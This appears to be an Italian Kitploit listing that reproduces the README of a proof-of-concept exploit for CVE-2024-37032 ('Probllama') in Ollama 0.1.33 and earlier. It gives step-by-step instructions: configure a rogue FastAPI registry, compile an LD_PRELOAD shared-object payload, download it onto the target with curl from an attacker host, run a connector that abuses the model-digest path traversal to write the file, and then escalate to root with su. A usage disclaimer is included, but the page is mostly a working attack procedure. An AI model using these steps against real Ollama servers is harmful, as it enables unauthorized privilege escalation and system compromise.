Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2024-37032-PoC — CVE-2024-37032 (Probllama) PoC per Ollama ≤0.1.33: path traversal e scrittura arbitraria di file tramite la gestione del digest del modello, che porta a escalation di privilegi automatizzata. | Kitploit
Strumenti/GitHubGitHub/itzsh4dowxz/cve-2024-37032-poc
Escalation di PrivilegiAnalisi delle VulnerabilitàAnalisi del CodiceExploitSfruttamento di Applicazioni WebPenetration TestingRed TeamingSviluppo Payload

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi
GitHub
itzsh4dowxz/cve-2024-37032-poc

CVE-2024-37032-PoC

CVE-2024-37032 (Probllama) PoC per Ollama ≤0.1.33: path traversal e scrittura arbitraria di file tramite la gestione del digest del modello, che porta a escalation di privilegi automatizzata.

Vedi Repository
822 mesi faNon ancora revisionato

CVE-2024-37032 Probllama PoC — Attraversamento del Path e Escalation dei Privilegi su Ollama

Questo repository contiene un server di registry FastAPI proof of concept, uno script di connessione e una libreria demo di preload per test autorizzati in laboratorio.

Usalo solo su sistemi di tua proprietà o per i quali hai esplicita autorizzazione al test.

File

  • server.py: avvia il server FastAPI PoC.
  • rogue_server/config.py: configurazione centrale per il server PoC.
  • connector.py: invia le richieste pull/push all'API Ollama target.
  • preload_privs_demo.c: codice sorgente C per il payload dell'oggetto condiviso.
  • requirements.txt: dipendenze Python per il server PoC.

1. Installa le Dipendenze del Server

Sulla tua macchina host, installa le dipendenze Python:

root@kitploit:~
python -m pip install -r requirements.txt

2. Configura l'Host e le Porte

Modifica rogue_server/config.py sulla tua macchina host:

root@kitploit:~
HOST = "<your_host_ip_or_host_ip>"

Modifica connector.py:

root@kitploit:~
SERVER_HOST = "<your_host_ip_or_host_ip:8000>"
TARGET_HOST = "127.0.0.1"
TARGET_PORT = 11434

Note:

  • SERVER_HOST deve puntare all'host che esegue server.py.
  • Se il server PoC è in esecuzione sulla porta 8000, includi la porta sia in HOST che in SERVER_HOST, ad esempio 10.10.16.160:8000.
  • TARGET_HOST e TARGET_PORT devono puntare all'API Ollama target. Se connector.py viene eseguito direttamente sulla macchina target, di solito 127.0.0.1:11434 è corretto.
  • Se modifichi rogue_server/config.py, riavvia il server PoC.

3. Compila l'Oggetto Condiviso

Compila il file C e assegna all'output il nome libpreload_privs_demo.so:

root@kitploit:~
gcc -shared -fPIC -o libpreload_privs_demo.so preload_privs_demo.c

4. Trasferisci i File al Target

Copia questi file sulla macchina target autorizzata:

  • libpreload_privs_demo.so
  • connector.py

Un modo semplice è servirli dalla tua macchina host:

root@kitploit:~
python3 -m http.server 8081

Poi scaricali dalla macchina target:

root@kitploit:~
curl -O http://<your_host_ip>:8081/libpreload_privs_demo.so
curl -O http://<your_host_ip>:8081/connector.py

Dopo aver scaricato l'oggetto condiviso, copia il suo percorso assoluto sulla macchina target e imposta lo stesso percorso come exploit_path in rogue_server/config.py sulla macchina host.

Esempio:

root@kitploit:~
exploit_path = "/tmp/libpreload_privs_demo.so"

5. Avvia il Server PoC

Avvia il server FastAPI sulla tua macchina host:

root@kitploit:~
python server.py

Per impostazione predefinita, questo progetto avvia Uvicorn su 0.0.0.0:8000.

6. Esegui il Connector

Sulla macchina target autorizzata, esegui:

root@kitploit:~
python3 connector.py

Il connector invia le richieste pull e push all'API Ollama configurata.

7. Convalida il Risultato

Dopo che il connector ha terminato, esegui:

root@kitploit:~
su

In un target di laboratorio vulnerabile e correttamente configurato, il percorso di preload dovrebbe essere utilizzato e si può osservare la transizione dei privilegi.

Risoluzione dei Problemi

  • Verifica che il firewall dell'host permetta la porta del server PoC e la porta del server di file temporanei.
  • Verifica che SERVER_HOST in connector.py corrisponda a HOST in rogue_server/config.py.
  • Verifica che exploit_path sia il percorso assoluto esatto in cui si trova libpreload_privs_demo.so sulla macchina target.
  • Verifica che l'API Ollama target sia raggiungibile su TARGET_HOST:TARGET_PORT.
  • Riavvia server.py dopo aver modificato rogue_server/config.py.
Scarica lo strumento